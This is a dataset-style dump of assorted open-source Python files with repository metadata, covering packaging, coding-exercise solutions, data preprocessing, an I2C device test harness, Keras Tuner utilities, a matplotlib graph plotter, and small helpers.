| null | null | null | setup.py | Minterious/minter-monitoring | 1a2216be57dec491a970950c3b9cfc72cea228c2 | [
"MIT"
]
| 1 | 2019-09-19T21:16:25.000Z | 2019-09-19T21:16:25.000Z | import setuptools
setuptools.setup(
name='mintermonitoring',
version='1.0.0',
packages=setuptools.find_packages(include=['mintermonitoring'])
)
| 19.25 | 66 | 0.746753 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 43 | 0.279221 |
7300890aeb852238c2f50f2aafaca22c70ba3108 | 158 | py | Python | Python/Back_solve_python/back_joon/StringArray/P10808.py | skyriv213/Studyriv | 6dfd3c52a873cd3bdb018280d81aec8bdcf61e6e | [
"MIT"
]
| null | null | null | Python/Back_solve_python/back_joon/StringArray/P10808.py | skyriv213/Studyriv | 6dfd3c52a873cd3bdb018280d81aec8bdcf61e6e | [
"MIT"
]
| null | null | null | Python/Back_solve_python/back_joon/StringArray/P10808.py | skyriv213/Studyriv | 6dfd3c52a873cd3bdb018280d81aec8bdcf61e6e | [
"MIT"
]
| null | null | null | s = input()
num = [0] * 26
for i in range(len(s)):
num[ord(s[i])-97] += 1
for i in num:
    print(i, end=" ")
print()
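# Worked example (illustrative): for the input "baekjoon" the printed counts are
# 1 1 0 0 1 0 0 0 0 1 1 0 0 1 2 0 0 0 0 0 0 0 0 0 0 0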
| 15.8 | 26 | 0.455696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0.018987 |
73009bb6994a5ff455eca19ffc1b698f9cf1d1d2 | 600 | py | Python | src/reliefcpp/utils.py | ferrocactus/reliefcpp | 41705a9e5c749e700f83f9fe9f352457ae57426d | [
"MIT"
]
| null | null | null | src/reliefcpp/utils.py | ferrocactus/reliefcpp | 41705a9e5c749e700f83f9fe9f352457ae57426d | [
"MIT"
]
| null | null | null | src/reliefcpp/utils.py | ferrocactus/reliefcpp | 41705a9e5c749e700f83f9fe9f352457ae57426d | [
"MIT"
]
| null | null | null | from enum import Enum
from numpy import isin
class Metric(Enum):
EUCLIDEAN = 0
MANHATTAN = 1
HAMMING = 2
L2 = 3
L1 = 4
metric_names = [
"euclidean",
"manhattan",
"hamming",
"l2",
"l1"
]
def _validate_metric(metric_name):
if isinstance(metric_name, Metric):
return metric_name.value
elif isinstance(metric_name, str):
metric_name = metric_name.lower()
return metric_names.index(metric_name)
elif isinstance(metric_name, int):
return metric_name
else:
raise ValueError("Could not identify metric.")
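# Illustrative examples (not part of the original module):
#   _validate_metric(Metric.MANHATTAN)  # -> 1 (enum value)
#   _validate_metric("L2")              # -> 3 (index into metric_names)
#   _validate_metric(2)                 # -> 2 (ints pass through unchanged)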
| 18.181818 | 54 | 0.638333 | 93 | 0.155 | 0 | 0 | 0 | 0 | 0 | 0 | 67 | 0.111667 |
7300c97c38a22ec9df0ea9ea6a865bb5bd5120e7 | 1,993 | py | Python | utilityFiles/createValidationDatasetFromXYTrainWithCandidates.py | jmfinelli/JavaNeuralDecompiler | fb914fcf4518815a4d00061b562617fc25e2f2b4 | [
"Apache-2.0"
]
| 1 | 2021-06-30T12:50:28.000Z | 2021-06-30T12:50:28.000Z | utilityFiles/createValidationDatasetFromXYTrainWithCandidates.py | jmfinelli/JavaNeuralDecompiler | fb914fcf4518815a4d00061b562617fc25e2f2b4 | [
"Apache-2.0"
]
| null | null | null | utilityFiles/createValidationDatasetFromXYTrainWithCandidates.py | jmfinelli/JavaNeuralDecompiler | fb914fcf4518815a4d00061b562617fc25e2f2b4 | [
"Apache-2.0"
]
| null | null | null | import pandas as pd
import os.path
length_switch = True
max_body_length = 50
process_candidates = os.path.exists('./datasets/candidates.output')
x_train = open('./datasets/x_train').readlines()
x_train = [x.rstrip('\n') for x in x_train]
y_train = open('./datasets/y_train').readlines()
y_train = [x.rstrip('\n') for x in y_train]
x_valid = open('./datasets/x_valid').readlines()
x_valid = [x.rstrip('\n') for x in x_valid]
y_valid = open('./datasets/y_valid').readlines()
y_valid = [x.rstrip('\n') for x in y_valid]
bytecodes = open('./datasets/bytecode.output').readlines()
bytecodes = [x.rstrip('\n') for x in bytecodes]
references = open('./datasets/references.output').readlines()
references = [x.rstrip('\n') for x in references]
if (process_candidates):
candidates = open('./datasets/candidates.output').readlines()
candidates = [x.rstrip('\n') for x in candidates]
df_pairs = pd.DataFrame({'source': bytecodes, 'target' : references, 'candidates': candidates })
else:
df_pairs = pd.DataFrame({'source': bytecodes, 'target': references })
if (length_switch):
mask = df_pairs['source'].apply(lambda x: len(x.split()) <= max_body_length)
df_pairs = df_pairs.loc[mask]
df_train = pd.DataFrame({'source': x_train + x_valid, 'target' : y_train + y_valid })
df_valid = df_pairs.merge(df_train, on='source', indicator=True, how='left')\
.query('_merge=="left_only"')\
.drop('_merge', axis=1)\
.drop('target_y', axis=1)
# df_valid = df_valid.sample(frac=1).reset_index(drop=True).sample(50000)
with open('./datasets/remaining_sources', 'w') as filehandle:
filehandle.writelines("%s\n" % place for place in df_valid['source'])
with open('./datasets/remaining_references', 'w') as filehandle:
filehandle.writelines("%s\n" % place for place in df_valid['target_x'])
if (process_candidates):
with open('./datasets/remaining_candidates', 'w') as filehandle:
filehandle.writelines("%s\n" % place for place in df_valid['candidates']) | 39.078431 | 100 | 0.697441 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 573 | 0.287506 |
7303a20740842e72c83f9691beba5498f652855d | 105 | py | Python | py/Utility.GetData.py | mathematicalmichael/SpringNodes | 3ff4034b6e57ee6efa55c963e1819f3d30a2c4ab | [
"MIT"
]
| 51 | 2015-09-25T09:30:57.000Z | 2022-01-19T14:16:44.000Z | py/Utility.GetData.py | sabeelcoder/SpringNodes | e21a24965474d54369e74d23c06f8c42a7b926b5 | [
"MIT"
]
| 66 | 2015-09-30T02:43:32.000Z | 2022-03-31T02:26:52.000Z | py/Utility.GetData.py | sabeelcoder/SpringNodes | e21a24965474d54369e74d23c06f8c42a7b926b5 | [
"MIT"
]
| 48 | 2015-11-19T01:34:47.000Z | 2022-02-25T17:26:48.000Z | import System
dataKey, _ = IN
OUT = System.AppDomain.CurrentDomain.GetData("_Dyn_Wireless_%s" % dataKey) | 26.25 | 74 | 0.780952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18 | 0.171429 |
7303be01ae89f9c41f09c1617f6cea31c52d0cf4 | 347 | py | Python | codes_/1189_Maximum_Number_of_Balloons.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
]
| null | null | null | codes_/1189_Maximum_Number_of_Balloons.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
]
| null | null | null | codes_/1189_Maximum_Number_of_Balloons.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
]
| null | null | null | # %% [1189. *Maximum Number of Balloons](https://leetcode.com/problems/maximum-number-of-balloons/)
# Problem: return how many instances of the word "balloon" can be formed from text
# Approach: count the characters with collections.Counter
import collections
class Solution:
def maxNumberOfBalloons(self, text: str) -> int:
c = collections.Counter(text)
return min(c[s] // n for s, n in collections.Counter("balloon").items())
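# Worked examples (from the problem statement, shown here for illustration):
#   Solution().maxNumberOfBalloons("nlaebolko")         # -> 1
#   Solution().maxNumberOfBalloons("loonbalxballpoon")  # -> 2
#   Solution().maxNumberOfBalloons("leetcode")          # -> 0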
| 43.375 | 99 | 0.700288 | 187 | 0.478261 | 0 | 0 | 0 | 0 | 0 | 0 | 209 | 0.534527 |
7303f0aa47265452a8086f8bcf4551e8db1e3810 | 7,746 | py | Python | src/Quiet.X.Tests/i2c_test.py | callwyat/Quiet-Firmware | 864c210e44d368a4a683704841067717ebc8ac43 | [
"MIT"
]
| null | null | null | src/Quiet.X.Tests/i2c_test.py | callwyat/Quiet-Firmware | 864c210e44d368a4a683704841067717ebc8ac43 | [
"MIT"
]
| null | null | null | src/Quiet.X.Tests/i2c_test.py | callwyat/Quiet-Firmware | 864c210e44d368a4a683704841067717ebc8ac43 | [
"MIT"
]
| null | null | null | from quiet_coms import find_quiet_ports
from quiet import Quiet
import time
if 'EXIT_ON_FAIL' not in locals():
VERBOSE = True
EXIT_ON_FAIL = True
class QuietI2C(Quiet):
def __init__(self, coms, **kargs) -> None:
Quiet.__init__(self, coms, **kargs)
def raw_write(self, addr: int, data: bytearray):
command = f'IIC:ADDR {addr};WRIT'
self.writeIEEE(command, data)
def raw_read(self, addr: int, readCount: int) -> bytearray:
message = f'IIC:ADDR {addr};READ? {readCount}'
return self.queryIEEE(message)
def register_write(self, address: int, register:int, data: int, dataSize=2):
self.write(f'IIC:ADDR {address};REGI:ADDR {register};RSIZ {dataSize};WRIT {data}')
def register_read(self, address: int, register:int, dataSize=1) -> int:
return self.query_int(f'IIC:ADDR {address};REGI:ADDR {register};RSIZ {dataSize};READ?')
def enable_master_mode(self) -> None:
self.set_and_verify('IIC:MODE', 'MAST')
def disable(self) -> None:
self.set_and_verify('IIC:MODE', 'OFF')
def acknowledged(self) -> bool:
ack = self.query('IIC:ACK?')
return '1' in ack
def _i2c_register_read_test(i: QuietI2C, address:int, register:int, expectation:int):
value = i.register_read(address, register, 2)
if value != expectation:
message = f'Failure at {hex(address)}:{hex(register)}. Expected {hex(expectation)} but read {hex(value)}'
if EXIT_ON_FAIL:
            raise Exception(message)
else:
print(message)
elif VERBOSE:
print(f'REG\t{hex(address)}:{hex(register)} -> {hex(value)}')
def _i2c_register_write_test(i: QuietI2C, address:int, register:int, value:int):
i.register_write(address, register, value, 2)
time.sleep(0.1)
_i2c_register_read_test(i, address, register, value)
def _i2c_raw_write(i: QuietI2C, address:int, data:bytearray):
i.raw_write(address, data)
if VERBOSE:
print(f'RAW\t{hex(address)} -> {str(data)[10:].strip(")")}')
def _i2c_raw_read_test(i: QuietI2C, address:int, expected:bytearray):
response = i.raw_read(address, len(expected))
if response != expected:
message = f'Failure at {hex(address)}. Expected {expected} but read {response}'
if EXIT_ON_FAIL:
raise Exception(message)
else:
print(message)
elif VERBOSE:
print(f'RAW\t{hex(address)} <- {response}')
def _i2c_check_error(i: QuietI2C, error_name: str, expectation: int):
error = i.error()
if error != expectation:
message = f'Failure {error_name}. Expected {hex(expectation)} received {hex(error)}'
if EXIT_ON_FAIL:
raise Exception(message)
else:
print(message)
elif VERBOSE:
print(f'{error_name.ljust(32)} Pass')
def _i2c_check_lower_limit(i: QuietI2C, command:str, low:int, error_name:str, error_code, delay:int=0):
under = low - 1
i.write(f'{command} {under}')
if delay > 0:
time.sleep(delay)
_i2c_check_error(i, f'UNDER {error_name}', error_code if under >= 0 else 0x0110)
i.write(f'{command} {low}')
if delay > 0:
time.sleep(delay)
_i2c_check_error(i, f'LOWER {error_name}', 0x00)
def _i2c_check_upper_limit(i: QuietI2C, command:str, high:int, error_name:str, error_code, delay:int=0):
i.write(f'{command} {high}')
if delay > 0:
time.sleep(delay)
_i2c_check_error(i, f'UPPER {error_name}', 0x00)
i.write(f'{command} {high + 1}')
if delay > 0:
time.sleep(delay)
_i2c_check_error(i, f'OVER {error_name}', error_code)
def _i2c_check_limit(i: QuietI2C, command:str, low:int, high:int, error_name:str, error_code):
_i2c_check_lower_limit(i, command, low, error_name, error_code)
_i2c_check_upper_limit(i, command, high, error_name, error_code)
def _i2c_check_acknowledge(i, expectation:bool):
ack = i.acknowledged()
if ack != expectation:
if ack:
message = f'Failure ACKNOWLEDGED. Expected NO_ACKNOWLEDGED received ACKNOWLEDGED'
else:
message = f'Failure ACKNOWLEDGED. Expected ACKNOWLEDGED received NO_ACKNOWLEDGED'
if EXIT_ON_FAIL:
raise Exception(message)
else:
print(message)
elif VERBOSE:
print(f'{("" if ack else "NO_")}ACKNOWLEDGED'.ljust(32) + ' Pass')
def i2c_test_errors(i: QuietI2C) -> bool:
# Clear Errors
i.error()
# Verify the second hook works
if i.query_int('SYST:ERR?') != 0:
messsage = 'Failure "SYS:ERR?" Command'
if EXIT_ON_FAIL:
raise Exception(messsage)
else:
print(messsage)
elif VERBOSE:
print('IIC:REGI:ERRO? Pass')
i.disable()
_i2c_check_error(i, 'ERROR_NONE', 0x00)
_i2c_check_limit(i, 'IIC:BAUD', 16000, 1000000, 'INVALID_BAUD', 0x0B01)
_i2c_check_limit(i, 'IIC:TIME', 1, 255, 'INVALID_TIMEOUT', 0x0B02)
_i2c_check_limit(i, 'IIC:ADDR', 0, 127, 'INVALID_ADDRESS', 0x0B03)
i.write('IIC:MODE MAS')
_i2c_check_error(i, 'ERROR_INVALID_MODE', 0x0B04)
_i2c_check_limit(i, 'IIC:REGI:RSIZ', 1, 2, 'INVALID_RSIZE', 0x0B20)
_i2c_check_limit(i, 'IIC:REGI:ADDR', 0, 255, 'INVALID_REGISTER_ADDRESS', 0x0B21)
i.write('IIC:REGI:WRIT 1')
_i2c_check_error(i, 'ERROR_DISABLED_WRITE', 0x0B10)
i.query('IIC:REGI:READ?')
i.com.flushInput()
_i2c_check_error(i, 'ERROR_DISABLED_READ', 0x0B11)
i.write('IIC:WRIT #11A')
_i2c_check_error(i, 'ERROR_DISABLED_WRITE', 0x0B10)
i.query('IIC:READ? 2')
_i2c_check_error(i, 'ERROR_DISABLED_READ', 0x0B11)
i.reset()
i.enable_master_mode()
try:
i.write('IIC:ADDR 0x50;REGI:ADDR 0xFF;RSIZ 1')
i.com.flushInput()
_i2c_check_upper_limit(i, 'IIC:REGI:WRIT', 255, 'INVALID_REGISTER_VALUE', 0x0B22, 0.1)
i.write('IIC:WRIT #10')
i.com.flushInput()
time.sleep(0.1)
_i2c_check_error(i, 'I2C_ERROR_INVALID_WRITE_SIZE', 0x0B31)
i.write('IIC:READ? 0')
i.com.flushInput()
time.sleep(0.1)
_i2c_check_error(i, 'I2C_ERROR_INVALID_READ_SIZE', 0x0B32)
i.write('IIC:WRIT #296' + '0123456789ABCDEF' * 6)
i.com.flushInput()
time.sleep(0.1)
_i2c_check_error(i, 'I2C_ERROR_INVALID_WRITE_SIZE', 0x0B31)
i.query('IIC:READ? 96')
i.com.flushInput()
time.sleep(0.1)
_i2c_check_error(i, 'I2C_ERROR_INVALID_READ_SIZE', 0x0B32)
i.write('IIC:READ?')
i.com.flushInput()
_i2c_check_error(i, 'I2C_ERROR_INVALID_READ_SYNTAX', 0x0B33)
i.write('IIC:ADDR 0x10;WRIT #13ABC')
time.sleep(0.1)
_i2c_check_acknowledge(i, False)
finally:
i.disable()
def i2c_test(i: QuietI2C) -> bool:
i.reset()
i.enable_master_mode()
try:
_i2c_register_read_test(i, 0x50, 0xFE, 0x5449)
_i2c_register_read_test(i, 0x50, 0xFF, 0x1004)
_i2c_register_write_test(i, 0x50, 0x0C, 0x05AA)
_i2c_register_write_test(i, 0x50, 0x08, 0x1E00)
_i2c_register_write_test(i, 0x50, 0x0A, 0x5F80)
_i2c_raw_write(i, 0x50, bytearray([0xFF]))
_i2c_raw_read_test(i, 0x50, bytearray([0x10, 0x04]))
_i2c_raw_write(i, 0x50, bytearray([0x0C, 0x05, 0xA0]))
_i2c_raw_write(i, 0x50, bytearray([0x0C]))
_i2c_raw_read_test(i, 0x50, bytearray([0x05, 0xA0]))
finally:
i.disable()
if __name__ == "__main__":
q2c = QuietI2C(None, log_path='usb_log.txt')
i2c_test(q2c)
i2c_test_errors(q2c)
i2c_test(q2c)
print('All I2C Tests Passed')
| 29.340909 | 113 | 0.631423 | 1,034 | 0.133488 | 0 | 0 | 0 | 0 | 0 | 0 | 1,860 | 0.240124 |
7304d96eed7cd6d1a985ffc90a2d6a94ba9983b7 | 716 | py | Python | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/Overflow/_Data-Structures/binary-tree/binary-tree-tilt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
]
| 5 | 2021-06-02T23:44:25.000Z | 2021-12-27T16:21:57.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/Overflow/_Data-Structures/binary-tree/binary-tree-tilt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
]
| 22 | 2021-05-31T01:33:25.000Z | 2021-10-18T18:32:39.000Z | WEEKS/CD_Sata-Structures/_RESOURCES/python-prac/Overflow/_Data-Structures/binary-tree/binary-tree-tilt.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
]
| 3 | 2021-06-19T03:37:47.000Z | 2021-08-31T00:49:51.000Z | # Source : https://leetcode.com/problems/binary-tree-tilt/description/
# Date : 2017-12-26
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def findTilt(self, root):
"""
:type root: TreeNode
:rtype: int
"""
global ans
ans = 0
self.sumOfNode(root)
return ans
def sumOfNode(self, root):
if root == None:
return 0
left = self.sumOfNode(root.left)
right = self.sumOfNode(root.right)
global ans
ans += abs(left - right)
return left + right + root.val
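# Worked example (illustrative): for the tree [1, 2, 3] both leaves have tilt 0
# and the root has tilt |2 - 3| = 1, so findTilt returns 1.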
| 21.058824 | 70 | 0.540503 | 456 | 0.636872 | 0 | 0 | 0 | 0 | 0 | 0 | 311 | 0.434358 |
7305e3962fe9733cd02f16a567ab4d4b8d8a9743 | 7,581 | py | Python | kerastuner/engine/tuner_utils.py | krantirk/keras-tuner | fbc34866bf4e7ff1d60bf8c341a9325b9d5429b3 | [
"Apache-2.0"
]
| 1 | 2019-07-12T17:17:06.000Z | 2019-07-12T17:17:06.000Z | kerastuner/engine/tuner_utils.py | nishantsbi/keras-tuner | fbc34866bf4e7ff1d60bf8c341a9325b9d5429b3 | [
"Apache-2.0"
]
| null | null | null | kerastuner/engine/tuner_utils.py | nishantsbi/keras-tuner | fbc34866bf4e7ff1d60bf8c341a9325b9d5429b3 | [
"Apache-2.0"
]
| 1 | 2020-01-02T04:07:22.000Z | 2020-01-02T04:07:22.000Z | # Copyright 2019 The Keras Tuner Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for Tuner class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
from collections import defaultdict
import numpy as np
import time
import random
import hashlib
import tensorflow as tf
from tensorflow import keras
from ..abstractions import display
class TunerStats(object):
"""Track tuner statistics."""
def __init__(self):
self.num_generated_models = 0 # overall number of instances generated
self.num_invalid_models = 0 # how many models didn't work
self.num_oversized_models = 0 # num models with params> max_params
def summary(self, extended=False):
display.subsection('Tuning stats')
display.display_settings(self.get_config())
def get_config(self):
return {
'num_generated_models': self.num_generated_models,
'num_invalid_models': self.num_invalid_models,
'num_oversized_models': self.num_oversized_models
}
@classmethod
def from_config(cls, config):
stats = cls()
stats.num_generated_models = config['num_generated_models']
stats.num_invalid_models = config['num_invalid_models']
stats.num_oversized_models = config['num_oversized_models']
return stats
def get_max_epochs_and_steps(fit_args, fit_kwargs):
if fit_args:
x = tf.nest.flatten(fit_args)[0]
else:
x = tf.nest.flatten(fit_kwargs.get('x'))[0]
batch_size = fit_kwargs.get('batch_size', 32)
if hasattr(x, '__len__'):
max_steps = math.ceil(float(len(x)) / batch_size)
else:
max_steps = fit_kwargs.get('steps')
max_epochs = fit_kwargs.get('epochs', 1)
return max_epochs, max_steps
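# Illustrative example (not part of the original module): with an `x` of length
# 1000 plus batch_size=32 and epochs=3 in fit_kwargs, this returns (3, 32),
# since math.ceil(1000 / 32) == 32 steps per epoch.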
class TunerCallback(keras.callbacks.Callback):
def __init__(self, tuner, trial, execution):
self.tuner = tuner
self.trial = trial
self.execution = execution
def on_epoch_begin(self, epoch, logs=None):
self.tuner.on_epoch_begin(
self.execution, self.model, epoch, logs=logs)
def on_batch_begin(self, batch, logs=None):
self.tuner.on_batch_begin(self.execution, self.model, batch, logs)
def on_batch_end(self, batch, logs=None):
self.tuner.on_batch_end(self.execution, self.model, batch, logs)
def on_epoch_end(self, epoch, logs=None):
self.tuner.on_epoch_end(
self.execution, self.model, epoch, logs=logs)
class Display(object):
def __init__(self, host):
self.host = host
self.cpu_usage = []
self.gpu_usage = []
self.batch_history = defaultdict(list)
self.epoch_pbar = None
def on_execution_begin(self, trial, execution, model):
# new model summary
if len(trial.executions) == 1:
display.section('New model')
trial.summary()
# execution info if needed
if trial.max_executions > 1:
display.subsection('Execution %d/%d' %
(len(trial.executions),
trial.max_executions))
def on_trial_end(self,
averaged_metrics,
best_metrics,
objective,
remaining_trials,
max_trials):
# train summary
current = averaged_metrics
best = best_metrics
rows = [['Name', 'Best model', 'Current model']]
for name in best.names:
best_value = round(best.get_best_value(name), 4)
current_value = round(current.get_best_value(name), 4)
row = [name, best_value, current_value]
if name == objective:
if best_value == current_value:
row = display.colorize_row(row, 'green')
else:
row = display.colorize_row(row, 'red')
rows.append(row)
display.display_table(rows)
# Tuning budget exhausted
if remaining_trials < 1:
display.highlight('Hypertuning complete - results in %s' %
self.host.results_dir)
# TODO: final summary
else:
display.highlight('%d/%d trials left' %
(remaining_trials, max_trials))
def on_epoch_begin(self, execution, model, epoch, logs=None):
# reset counters
self.epoch_history = defaultdict(list)
self.gpu_usage = []
self.cpu_usage = []
# epoch bar
self.epoch_pbar = display.progress_bar(
total=execution.max_steps,
leave=True,
unit='steps')
def on_epoch_end(self, execution, model, epoch, logs=None):
# compute stats
final_epoch_postfix = {}
for m, v in logs.items():
final_epoch_postfix[m] = round(v, 4)
# epoch bar
self.epoch_pbar.set_postfix(final_epoch_postfix)
self.epoch_pbar.close()
def on_batch_end(self, execution, model, batch, logs=None):
logs = logs or {}
self.epoch_pbar.update(1)
# computing metric statistics
for k, v in logs.items():
self.batch_history[k].append(v)
avg_metrics = self._avg_metrics(self.batch_history)
self.epoch_pbar.set_postfix(avg_metrics)
# create bar desc with updated statistics
description = ''
host_status = self.host.get_status()
if len(host_status['gpu']):
gpu_usage = [float(gpu['usage']) for gpu in host_status['gpu']]
gpu_usage = int(np.average(gpu_usage))
self.gpu_usage.append(gpu_usage)
description += '[GPU:%3s%%]' % int(np.average(self.gpu_usage))
self.cpu_usage.append(int(host_status['cpu']['usage']))
description += '[CPU:%3s%%]' % int(np.average(self.cpu_usage))
description += 'Epoch %s/%s' % (execution.epochs_seen + 1,
execution.max_epochs)
self.epoch_pbar.set_description(description)
def _avg_metrics(self, metrics):
agg_metrics = {}
for metric_name, values in metrics.items():
if metric_name == 'batch' or metric_name == 'size':
continue
agg_metrics[metric_name] = '%.4f' % np.average(values)
return agg_metrics
def generate_trial_id():
s = str(time.time()) + str(random.randint(1, 1e7))
return hashlib.sha256(s.encode('utf-8')).hexdigest()[:32]
def format_execution_id(i, executions_per_trial):
execution_id_length = math.ceil(
math.log(executions_per_trial, 10))
execution_id_template = '%0' + str(execution_id_length) + 'd'
execution_id = execution_id_template % i
return execution_id
@contextlib.contextmanager
def maybe_distribute(distribution_strategy):
if distribution_strategy is None:
yield
else:
with distribution_strategy.scope():
yield
| 33.544248 | 78 | 0.626962 | 5,570 | 0.734732 | 168 | 0.022161 | 484 | 0.063844 | 0 | 0 | 1,390 | 0.183353 |
7306a719a754d7eb090a7a28857cf9ab3cc30caf | 1,880 | py | Python | plotter.py | ZiegHailo/SMUVI | c324c881c511f1c44e481f93e6bd6fe7f85d4ded | [
"MIT"
]
| null | null | null | plotter.py | ZiegHailo/SMUVI | c324c881c511f1c44e481f93e6bd6fe7f85d4ded | [
"MIT"
]
| null | null | null | plotter.py | ZiegHailo/SMUVI | c324c881c511f1c44e481f93e6bd6fe7f85d4ded | [
"MIT"
]
| null | null | null | __author__ = 'zieghailo'
import matplotlib.pyplot as plt
# plt.ion()
def show():
plt.show()
plt.get_current_fig_manager().full_screen_toggle()
def plot_graph(graph):
# plt.ion()
x = [p.x for p in graph.points]
y = [p.y for p in graph.points]
plt.plot(x, y, 'b*')
plt.draw()
def plot_arrows(graph):
for p in graph.points:
x = p.x
y = p.y
for c in p.connections:
cx = c.x
cy = c.y
# ax.arrow(x, y, cx-x, cy-y)
plt.plot([x, cx], [y, cy], 'k')
plt.draw()
def plot_visited(visited):
x = [p.x for p in visited]
y = [p.y for p in visited]
plt.plot(x, y, 'ro', ms=10)
plt.draw()
def plot_connection(start, end):
plt.plot([start.x, end.x], [start.y, end.y], 'g', linewidth=4)
def start_gui(graph):
fig = plt.figure(1)
ax = fig.add_subplot(111)
ax.set_title('click to build line segments')
ax.axis('equal')
line, = ax.plot([0, 100], [0, 100], 'b.') # empty line
pointbuilder = PointBuilder(line, ax, graph)
fig.waitforbuttonpress(0)
class PointBuilder:
def __init__(self, points, ax, graph):
self.points = points
self.ax = ax
self.graph = graph
self.cid = points.figure.canvas.mpl_connect('button_press_event', self)
self.kid = points.figure.canvas.mpl_connect('key_press_event', self)
def __call__(self, event):
        print('click', event)
        if event.inaxes != self.points.axes: return
self.graph.add_point(event.xdata, event.ydata)
x = [p.x for p in self.graph.points]
y = [p.y for p in self.graph.points]
plt.cla()
self.graph.build_graph()
plot_arrows(self.graph)
plot_graph(self.graph)
if event.key != 'x':
plt.waitforbuttonpress(0)
if __name__ == "__main__":
start_gui() | 22.650602 | 79 | 0.579787 | 738 | 0.392553 | 0 | 0 | 0 | 0 | 0 | 0 | 185 | 0.098404 |
7306a81bcc0bef579d78b882fb2bc110b0f6bf5f | 1,506 | py | Python | fannypack/utils/_deprecation.py | brentyi/hfdsajk | 2888aa5d969824ac1e1a528264674ece3f4703f9 | [
"MIT"
]
| 5 | 2020-03-13T21:34:31.000Z | 2020-10-27T15:18:17.000Z | fannypack/utils/_deprecation.py | brentyi/hfdsajk | 2888aa5d969824ac1e1a528264674ece3f4703f9 | [
"MIT"
]
| 2 | 2020-06-17T11:06:56.000Z | 2020-10-25T03:06:18.000Z | fannypack/utils/_deprecation.py | brentyi/hfdsajk | 2888aa5d969824ac1e1a528264674ece3f4703f9 | [
"MIT"
]
| 4 | 2020-03-15T01:55:18.000Z | 2022-01-21T22:06:48.000Z | import warnings
from typing import Callable, Optional, TypeVar, cast
CallableType = TypeVar("CallableType", bound=Callable)
def deprecation_wrapper(message: str, function_or_class: CallableType) -> CallableType:
"""Creates a wrapper for a deprecated function or class. Prints a warning
the first time a function or class is called.
Args:
message (str): Warning message.
function_or_class (CallableType): Function or class to wrap.
Returns:
CallableType: Wrapped function/class.
"""
warned = False
def curried(*args, **kwargs): # pragma: no cover
nonlocal warned
if not warned:
warnings.warn(message, DeprecationWarning, stacklevel=2)
warned = True
return function_or_class(*args, **kwargs)
return cast(CallableType, curried)
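# Illustrative usage sketch (not part of the original module); `old_fn` and
# `new_fn` are hypothetical names:
#
#   old_fn = deprecation_wrapper("old_fn is deprecated.", new_fn)
#   old_fn()  # warns once with DeprecationWarning, then calls new_fn()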
def new_name_wrapper(
old_name: str, new_name: str, function_or_class: CallableType
) -> CallableType:
"""Creates a wrapper for a renamed function or class. Prints a warning the first
time a function or class is called with the old name.
Args:
old_name (str): Old name of function or class. Printed in warning.
new_name (str): New name of function or class. Printed in warning.
function_or_class (CallableType): Function or class to wrap.
Returns:
CallableType: Wrapped function/class.
"""
return deprecation_wrapper(
f"{old_name} is deprecated! Use {new_name} instead.", function_or_class
)
| 31.375 | 87 | 0.688579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 831 | 0.551793 |
7307b7da6fb6d2b5a5aa27d12b5f25e31c28bd7c | 319 | py | Python | write/5_json_writer.py | pavlovprojects/python_qa_test_data | 4066f73c83cdd4ace9d6150726a578c0326daf94 | [
"MIT"
]
| null | null | null | write/5_json_writer.py | pavlovprojects/python_qa_test_data | 4066f73c83cdd4ace9d6150726a578c0326daf94 | [
"MIT"
]
| null | null | null | write/5_json_writer.py | pavlovprojects/python_qa_test_data | 4066f73c83cdd4ace9d6150726a578c0326daf94 | [
"MIT"
]
| null | null | null | import json
data = {
"users": [
{"Name": "Dominator", "skill": 100, "gold": 99999, "weapons": ['Sword', 'Atomic Laser']},
{"Name": "Looser", "skill": 1, "gold": -100000, "weapons": [None, None, None]},
]
}
with open("example.json", "w") as f:
s = json.dumps(data, indent=4)
f.write(s)
| 24.538462 | 97 | 0.526646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 120 | 0.376176 |
730824ac4dba3e614be06b76613a0a6b290846f5 | 46 | py | Python | src/utils.py | sequoia-tree/cs370 | 47bf7f56d20bd81abbdbd0502477afcd5f62bbbe | [
"CC-BY-4.0"
]
| 1 | 2019-01-14T08:31:45.000Z | 2019-01-14T08:31:45.000Z | src/utils.py | sequoia-tree/teaching-cs | 47bf7f56d20bd81abbdbd0502477afcd5f62bbbe | [
"CC-BY-4.0"
]
| null | null | null | src/utils.py | sequoia-tree/teaching-cs | 47bf7f56d20bd81abbdbd0502477afcd5f62bbbe | [
"CC-BY-4.0"
]
| null | null | null | from md_utils import *
from py_utils import *
| 15.333333 | 22 | 0.782609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
73085370dd0ae578546e4f06c27e87ad769b743a | 387 | py | Python | practice/ai/machine-learning/digital-camera-day-or-night/digital-camera-day-or-night.py | zeyuanxy/HackerRank | 5194a4af780ece396501c215996685d1be529e73 | [
"MIT"
]
